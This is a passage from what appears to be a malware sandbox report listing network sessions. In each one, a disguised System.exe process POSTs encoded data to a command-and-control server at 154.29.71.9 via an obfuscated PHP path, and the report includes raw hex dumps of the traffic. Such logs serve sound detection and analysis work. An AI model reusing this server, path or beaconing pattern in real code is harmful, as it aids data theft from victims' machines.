                                                                                                    26 | 192.168.2.4 | 49767 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:39.664438963 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:40.020354986 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:40.181425095 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:40.314207077 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    27 | 192.168.2.4 | 49768 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:40.448903084 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:40.801292896 CET | 2596 | OUT


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    28 | 192.168.2.4 | 49769 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:40.948993921 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:41.304003000 CET | 1876 | OUT
                                                                                                    Jan 4, 2025 14:52:41.469109058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:41.598834991 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    29 | 192.168.2.4 | 49770 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:41.463892937 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:41.816831112 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:42.010025978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:42.147977114 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    30 | 192.168.2.4 | 49771 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:42.496752024 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:42.848098040 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:43.013020039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:43.142088890 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
                                                                                                    Jan 4, 2025 14:52:43.359467030 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    31 | 192.168.2.4 | 49772 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:43.281759977 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:43.629342079 CET | 2600 | OUT
                                                                                                    Jan 4, 2025 14:52:43.799000025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:43.926270008 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    32 | 192.168.2.4 | 49773 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:44.126622915 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:44.474004030 CET | 2600 | OUT | Data Raw: 59 50 58 59 5b 5d 5d 51 5b 59 5a 55 50 5c 5b 53 56 55 54 43 52 5f 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXY[]]Q[YZUP\[SVUTCR_R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>:%8!>$?3U3',> -+P6%Q)& $X:/"Y ']/4
Jan 4, 2025 14:52:44.657025099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:44.830732107 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49774 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:44.971976995 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:45.317115068 CET | 2600 | OUT | Data Raw: 5c 5a 5d 5d 5b 54 58 52 5b 59 5a 55 50 5a 5b 51 56 52 54 48 52 58 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Z]][TXR[YZUPZ[QVRTHRXRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8X%18W=$+-38#/&Q5/W#;&=-$A$08-"Y ']/,
Jan 4, 2025 14:52:45.489480019 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:45.618202925 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49775 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:45.746390104 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:46.098968983 CET | 2600 | OUT | Data Raw: 59 58 58 5c 5b 54 58 50 5b 59 5a 55 50 59 5b 5b 56 52 54 48 52 51 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX\[TXP[YZUPY[[VRTHRQRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/%28?=<X)=%;X;0=6+#(*>$A13."Y ']/
Jan 4, 2025 14:52:46.300652981 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:46.435178995 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49776 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:46.626442909 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1864
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49777 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:46.900643110 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:47.254369974 CET | 2600 | OUT | Data Raw: 59 5d 58 51 5b 5f 58 5c 5b 59 5a 55 50 5d 5b 54 56 5c 54 41 52 5f 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]XQ[_X\[YZUP][TV\TAR_RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,5^2^9=#(7W' ;="-!;)W>/23:?"Y ']/0
Jan 4, 2025 14:52:47.424838066 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:47.560080051 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49778 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:47.697371006 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
Jan 4, 2025 14:52:48.051289082 CET | 2600 | OUT | Data Raw: 59 58 58 59 5e 58 5d 56 5b 59 5a 55 50 51 5b 55 56 5d 54 40 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXY^X]V[YZUPQ[UV]T@R^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;.Z1;%=.4(=$+/.#*6/#8V)>/1<./"Y ']/
Jan 4, 2025 14:52:48.242548943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:48.375917912 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49779 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:48.513093948 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:48.864162922 CET | 2600 | OUT | Data Raw: 59 5e 58 5d 5e 5f 58 50 5b 59 5a 55 50 5a 5b 56 56 52 54 41 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^X]^_XP[YZUPZ[VVRTAR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.528!=>(+=0;#8>P -0!=T>X+204:/"Y ']/,
Jan 4, 2025 14:52:49.045989990 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:49.177603960 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49780 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:49.520817995 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:49.879355907 CET | 2600 | OUT | Data Raw: 59 5c 5d 5b 5b 5b 5d 57 5b 59 5a 55 50 5a 5b 51 56 51 54 44 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\][[[]W[YZUPZ[QVQTDR^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>5Z%&?-$('U'+8Z/#%!'";=Q*/%U<Y-"Y ']/,
Jan 4, 2025 14:52:50.065375090 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:50.330246925 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
Jan 4, 2025 14:52:50.330285072 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49781 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:50.463970900 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:50.817687988 CET | 2600 | OUT | Data Raw: 59 51 5d 5b 5b 54 58 50 5b 59 5a 55 50 5e 5b 56 56 57 54 48 52 51 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQ][[TXP[YZUP^[VVWTHRQR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X.>%[&8===++3$+;.3*U6=3V!8*=#1 $.?"Y ']/<
Jan 4, 2025 14:52:51.137214899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:51.271933079 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
